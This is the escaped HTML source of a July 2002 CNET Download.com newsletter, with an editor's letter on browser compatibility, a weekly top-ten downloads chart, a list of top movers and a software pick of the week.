              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
    &lt;TR vAlign=top&gt;
      &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
        width=1&gt;&lt;/TD&gt;
      &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
        width=10&gt;&lt;/TD&gt;
      &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
        width=1&gt;&lt;/TD&gt;
        &lt;!-- ?? --&gt;
      &lt;TD width=100% bgColor=#ffffff&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#ffffef border=0&gt;
          &lt;TBODY&gt;
          &lt;TR vAlign=top&gt;
            &lt;TD width=10 rowSpan=2&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=10&gt;&lt;/TD&gt;
            &lt;TD colSpan=2&gt;
     &lt;!-- Date --&gt;
     &lt;font face="arial, helvetica" size="-2"&gt;&lt;b&gt;July 9, 2002&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
     &lt;!-- /Date --&gt;
      &lt;IMG height=8 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR vAlign=top&gt;
            &lt;TD align=left width=410&gt;&lt;IMG height=86
              src="http://download.cnet.com/i/dl/sptlt/waynec.gif"
              width=66 border=0 align=left hspace=15 vspace=5&gt;&lt;!--BR&gt;&lt;/TD&gt;
            &lt;TD width=315--&gt;
 &lt;!-- title --&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333
 size=3&gt;&lt;b&gt;Browse or bust&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;!-- /title --&gt;
 &lt;!-- letter --&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 Through daily use I've found that &lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKH-P5mHcLVdngyV7VDjSuR" &gt;Mozilla&lt;/a&gt; and &lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKSKpADjH7pz3F7_4EMIryR" &gt;Opera&lt;/a&gt; Web browsers beat Internet Explorer because of two features: tabbed windows and built-in pop-up killers. But occasionally I hit a site that has features that don't work or has a messed up layout, so I have to launch IE to view it correctly. In the last couple of years, Web builders have used &lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04FpVebwYF0F_wt9Q9dZPR" &gt;proprietary code&lt;/a&gt; from Microsoft in their sites, which Mozilla and Opera don't support.
 &lt;p&gt;
 I used to cover Web building, so I have plenty of insight into the problem. Using current, standard HTML and JavaScript, Web builders can make a Web site do almost anything that you could with Microsoft's proprietary code. The only things they can't do are goofy enhancements such as changing the browser scroll bar colors. To solve this compatibility problem, either Web builders have to take proprietary tags out of their sites or users have to use IE to view them. You can also enhance IE with utilities such as &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjW1GrwIKQCL5-NPyEdnR" &gt;Secure IE&lt;/a&gt; to get the kinds of features offered by Mozilla and Opera, giving you the best of both worlds.
 &lt;p&gt;
 Who do you think should be solving problems of Web site incompatibility: Web builders, users, or browser manufacturers? Let me know at &lt;a href="mailto:edit@download.com?subject=browse%20orbust"&gt;edit@download.com&lt;/a&gt;.
 &lt;p&gt;
 &lt;p&gt;Wayne Cunningham&lt;br&gt;
 Features Editor, CNET Download.com&lt;P&gt;
 &lt;!-- /letter --&gt;
            &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
            width=10&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
            &lt;!-- was 430--&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=100% border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
        &lt;TABLE cellSpacing=0 cellPadding=10 width=100% border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;!-- FEATURES &amp; REVIEWS --&gt;
   &lt;TABLE border=0 cellPadding= cellSpacing=0 width=100%&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;IMG
              alt="Reviews &amp;amp; Features"
              src="http://www.cnet.com/i/nl/lx/sub_rev.gif"
              border=0&gt;&lt;BR&gt;&lt;IMG height=8
              src="http://www.cnet.com/i/nl/rule.gif" width=410
              border=0&gt;&lt;BR&gt;
              &lt;TABLE align=left border=0 cellPadding=0 cellSpacing=0 width=95&gt;
                &lt;TBODY&gt;
                &lt;TR&gt;
                  &lt;TD&gt;&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KBrRpTx2LpqfRO9R6BpKcR" &gt;&lt;IMG
                    border=0 src="http://a.r.tv.com/cnet.1d/i/p/012802access1.jpg"&gt;
                &lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT
 face=arial,helvetica size=-1&gt;&lt;A
              name=h1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1Uy6j09C3V0z6qjySJGZR" &gt;
 Is your ISP safe from hack attacks?
 &lt;/A&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;Surely, the folks who run your ISP have thought long and
     hard about security issues, but should you count on them to
     ward off intruders? Not wise, says our ISP expert. In this
     week's column, Dan Tynan takes security matters into his own
     hands and shows you how to protect yourself.
 &lt;FONT face=arial,helvetica size=-1&gt;&lt;A
              name=h1&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKmmPupCPdWfGJ0kSyVjdR" &gt;
 Two apps that bring the iPod to the PC
 &lt;/A&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;That's right, Windows users. If you've been drooling over
     Apple's lovely little MP3 player, you're in luck. Not one
     but two software apps bring iPod compatibility to your
     FireWire-equipped PC. EphPod and XPlay square off in this
     battle of cross-platform compatibility.
 &lt;/font&gt;
              &lt;br&gt;&lt;br&gt;&lt;/TABLE&gt;
              &lt;!-- /FEATURES &amp; REVIEWS --&gt;
 &lt;!-- DOWNLOAD LAUNCHPAD --&gt;
 &lt;A name=h1&gt;&lt;IMG height=19 alt="CNET's Exclusive Downloads"
 src="http://www.cnet.com/i/nl/dl/HEAD_dwnld_launch.gif"
 width=175&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;!-- &lt;font face="arial,helvetica" size=+0
 color=#666666&gt;&lt;b&gt;&lt;i&gt;Download Launchpad&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;table width=410 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/i/b.gif" width=410&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt; --&gt;
 &lt;font face="verdana,geneva,helvetica" size=-2&gt;New products from our
 sponsors&lt;br&gt;&lt;/font&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/b.gif" width=1&gt;&lt;br&gt;
 &lt;B&gt; &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpWqpn4G3hGwiOPYOLipujcR" &gt;Say the Time&lt;/A&gt;&lt;/B&gt;
 &lt;BR&gt;Say the Time is the newest evolution of the cuckoo clock.
     Hear the time, set multiple alarms, customize the look of
     your taskbar clock, sync your PC with an atomic clock
     server, and more. Try it free.&lt;br&gt;&lt;br&gt;
 &lt;B&gt; &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdPVzhSBynOIRzw0LGkkRR" &gt;Ashampoo WinOptimizer Suite
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;Find redundant files, clean up
     your Registry, recover space on your hard disks, and
     optimize Windows performance.&lt;br&gt;&lt;br&gt;
 &lt;font face="verdana,geneva,helvetica" size=-2&gt;All Download Launchpad
 titles powered by Download Express--CNET's new speedy download
 service!&lt;/font&gt;&lt;br&gt;
 &lt;!-- /DOWNLOAD LAUNCHPAD --&gt;
 &lt;!-- top ten --&gt;
 &lt;BR&gt;
 &lt;A name=h2&gt;&lt;IMG height=19 alt="This Week's Top Ten Downloads"
 src="http://www.cnet.com/i/nl/dl/sub_top10.gif"
 width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;br&gt;
 &lt;!-- Top 10 intro --&gt;
 As KaZaA continues to maintain its stranglehold on
     No.1, BearShare continues its climb up the list to No. 6 .
 &lt;BR&gt;&lt;/FONT&gt;&lt;BR&gt;
 &lt;!-- /Top 10 intro --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=4 width="100%"
 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD width="6%" height=36&gt;&lt;FONT face="arial,
 helvetica" size=-1&gt; &lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;B&gt;Most Popular Titles&lt;/B&gt;&lt;BR&gt;
 &lt;!-- Week Ending Date --&gt;
          &lt;FONT size=-2&gt;Week ending July 9&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;!-- /Week Ending Date --&gt;
                  &lt;TD width="13%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;  &lt;B&gt;Last&lt;BR&gt;  Week&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD width="16%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;  &lt;B&gt;Weeks&lt;BR&gt;  on Chart&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD width="26%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;  &lt;B&gt;Downloads&lt;BR&gt;  This
                    Week&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;1.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDFIXBe2ePdo6MzbuNK5xFR" &gt;KaZaA
 Media Desktop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;1&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;10&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;1,839,092&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;2.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QkpEC7PHFbgi4cHr7W6T9R" &gt;Morpheus&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;2&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;62&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;742,235&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;3.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck_EmcnMaAV-hDEc2lRbuR" &gt;ICQ
 2002a&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;3&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;250&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;445,174&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;4.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPI7kFsfqabman8WccrYsR" &gt;WinZip&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
   	&lt;!-- Last week --&gt;
   		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;4&lt;/FONT&gt;&lt;/TD&gt;
   	&lt;!-- /Last week --&gt;
   	&lt;!-- Weeks on --&gt;
   		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;299&lt;/FONT&gt;&lt;/TD&gt;
   	&lt;!-- /Weeks on --&gt;
   	&lt;!-- Download count --&gt;
   		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;362,230&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;5.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DggdeadeVXCHnpqL0w4R" &gt;iMesh&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;5&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;115&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;305,699&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;6.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8X5rbylnqm86ccJ_2d2eR" &gt;BearShare&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;7&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;73&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;214,030&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;7.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwxPagqE80ywQ-4d0P6lR" &gt;Ad-aware&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;6&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;43&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;140,849&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;8.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kil7AFVBoaDkjVsTLZ89R" &gt;Download Accelerator&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;8&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;134&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;136,510&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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size=-2&gt;9.&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJolht9eKr1yZeU_u_KnuR" &gt;Qtraxmax&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;18&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;3&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;134,426&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;!-- /Download count --&gt;
                &lt;TR&gt;
                   &lt;TD colSpan=5&gt;
                     &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                       &lt;TBODY&gt;
                       &lt;TR&gt;
                         &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
                           src="http://www.cnet.com/b.gif"
                     width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
                 &lt;TR align=middle&gt;
                   &lt;TD width="6%" height=32&gt;&lt;FONT face="ms sans serif, geneva"
                     size=-2&gt;10.&lt;/FONT&gt;&lt;/TD&gt;
                   &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2wfwlLRWLXZBXqONOVsR" &gt;CNET CatchUp&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- Last week --&gt;
 		&lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;12&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Last week --&gt;
 	&lt;!-- Weeks on --&gt;
 		&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;114&lt;/FONT&gt;&lt;/TD&gt;
 	&lt;!-- /Weeks on --&gt;
 	&lt;!-- Download count --&gt;
 		&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;82,420&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;!-- /Download count --&gt;
                &lt;TR&gt;
                  &lt;TD colSpan=5&gt;
                    &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                      &lt;TBODY&gt;
                      &lt;TR&gt;
                        &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
                          src="http://www.cnet.com/b.gif"
                    width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
              &lt;P&gt;&lt;FONT face="arial, helvetica"
              size=-1&gt;
   &lt;!-- /top ten --&gt;
   &lt;!-- TOP 5 MOVERS --&gt;
            &lt;A name=h3&gt;&lt;IMG height=19
            alt="This Week's Top Movers"
            src="http://www.cnet.com/i/nl/dl/sub_topmv.gif" width=300&gt;&lt;/A&gt;&lt;BR&gt;
            &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
            &lt;FONT face="arial, helvetica" size=-1&gt;
            Here are some of the
 fastest-rising downloads on our Most Popular list.
            &lt;BR&gt;
            &lt;/FONT&gt;
            &lt;BR&gt;
            &lt;TABLE cellSpacing=0 cellPadding=4 width="100%" border=0&gt;&lt;TBODY&gt;
            &lt;TR&gt;
            &lt;TD width="6%" height=36&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt; &lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;Top Movers&lt;/B&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;The Rundown&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;1.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrssJZ4Dl5w8PF_jEuwtZR" &gt;Nero Burning ROM
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;This CD recording software is one of
        the top sellers at Shopper.com and clearly it's also
        popular at Downloads as it moves up 5 spots to No. 23.&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;2.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%" align="middle"&gt;&lt;FONT
 face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0Exfr2-J60_4Mc3148lk6dR" &gt;DocCommander
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%" align="left"&gt;&lt;FONT face="ms sans serif,
 geneva" size=-2&gt;Enhancing the Open and Save pop-ups in
        Windows seems to be on users' wish lists as this utility
        moves up 7 spots to No. 29.
        &lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;3.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOdbdE1WTRnU3P83P5XcR" &gt;SWiSH
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;Adding Flash animations to your Web site is always
        a good eye-catcher, so it's no surprise that this app has
        started to rise, moving up 7 spots to No. 31.&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;4.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwytZtpFmeE4rbg6amtIRR" &gt;Grand Theft Auto 2
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;The latest update for this game spurs
        even more interest in an already wildly popular series,
        moving up 9 spots to No. 33.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;/TR&gt;
            &lt;TR&gt;&lt;TD colSpan=3&gt;
            	&lt;TABLE cellSpacing=0 cellPadding=0 width="100%"
 border=0&gt;&lt;TBODY&gt;
            	&lt;TR&gt;
            	&lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
            	&lt;/TR&gt;
            	&lt;/TBODY&gt;&lt;/TABLE&gt;
            &lt;/TD&gt;&lt;/TR&gt;
            &lt;TR&gt;
            &lt;TD width="6%" height="32" align="middle"&gt;&lt;FONT face="ms
 sans serif, geneva" size=-2&gt;5.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1 align="middle"&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zaBL-VZ98ZvQIzTKtR1dR" &gt;IncrediMail Xe
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
            &lt;TD width="55%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2
 align="left"&gt;This customizable e-mailer continues to
        be popular with its personal look and makes a showing
        on the list at No. 40.&lt;/FONT&gt;&lt;/TD&gt;
            &lt;/TR&gt;
            &lt;TR&gt;&lt;TD colSpan=3&gt;
            	&lt;TABLE cellSpacing=0 cellPadding=0 width="100%"
 border=0&gt;&lt;TBODY&gt;
            	&lt;TR&gt;
            	&lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
            	&lt;/TR&gt;
            	&lt;/TBODY&gt;&lt;/TABLE&gt;
            &lt;/TD&gt;&lt;/TR&gt;
            &lt;/TBODY&gt;&lt;/TABLE&gt;
            &lt;FONT face="arial, helvetica" size=-1&gt;
            &lt;BR&gt;
            Want more? See our &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHokMfq9NyGEI9rCM8vcR" &gt;&lt;b&gt;Top 50&lt;/b&gt;&lt;/a&gt;
 downloads.
            &lt;P&gt;
            &lt;/FONT&gt;
   &lt;!-- /TOP 5 MOVERS --&gt;
   &lt;!-- OTB ad block --&gt;
   &lt;!-- /OTB ad block --&gt;
   &lt;!-- picks of the week --&gt;
     &lt;P&gt;&lt;FONT face="arial, helvetica"
                size=-1&gt;
     &lt;A name=h3&gt;&lt;IMG height=19
       alt="Picks of the Week"
       src="http://www.cnet.com/i/nl/dl/sub_picks.gif"
       width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
       src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Audio&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXejT5H5q_7DQESNPe-iRR" &gt;Quintessential Player 3.4
       &lt;/A&gt;&lt;/B&gt;&lt;BR&gt; &lt;FONT size=-2&gt; License: Free&lt;BR&gt;File size:
       2.48MB&lt;BR&gt;Minimum requirements: Windows 95/98/Me/NT/2000/XP
       &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;Tailor your PC music experience with this skinnable audio
     player that offers a vast array of plug-ins. Use the basic
     player in the background while you work on other apps, or
     perform a variety of operations from CD burning to playlist
     organizing or even processing with DSP effects.&lt;p&gt;
 Want to review Quintessential Player? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6pyIdXpsjHpx8lOheMnlR" &gt;here&lt;/A&gt;.&lt;p&gt;
